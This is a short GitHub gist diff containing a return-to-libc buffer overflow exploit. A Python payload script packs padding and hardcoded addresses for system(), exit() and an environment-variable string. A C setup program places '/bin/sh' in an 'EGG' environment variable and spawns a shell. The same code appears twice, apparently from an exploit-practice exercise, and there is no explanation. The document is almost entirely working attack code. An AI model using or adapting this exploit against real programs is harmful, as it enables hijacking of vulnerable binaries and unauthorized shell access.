amustaque97 · May 7, 2018 10:36
diff --git a/gistfile1.txt b/gistfile1.txt
 ============== payload file ============
 import struct
 padding="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
 system_addr = struct.pack('I',0xb7ecffb0)
 exit_addr = struct.pack('I',0xb7ec60c0)
 egg_var = struct.pack('I',0xbfffff95)
 print padding+system_addr+exit_addr+egg_var


 ================ setup file ===============
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>

 int main(int argc, char **argv) {
        char *ptr = getenv("EGG");
        if (ptr != NULL) 
                printf("Estimated address: %p\n",ptr);

        printf("Setting up environment...\n");
        setenv("EGG","/bin/sh",1);
        execl("/bin/sh",(char *) NULL);
 }
	============== payload file ============
	import struct
	padding="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
	system_addr = struct.pack('I',0xb7ecffb0)
	exit_addr = struct.pack('I',0xb7ec60c0)
	egg_var = struct.pack('I',0xbfffff95)
	print padding+system_addr+exit_addr+egg_var


	================ setup file ===============
	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>

	int main(int argc, char **argv) {
	char *ptr = getenv("EGG");
	if (ptr != NULL)
	printf("Estimated address: %p\n",ptr);

	printf("Setting up environment...\n");
	setenv("EGG","/bin/sh",1);
	execl("/bin/sh",(char *) NULL);
	}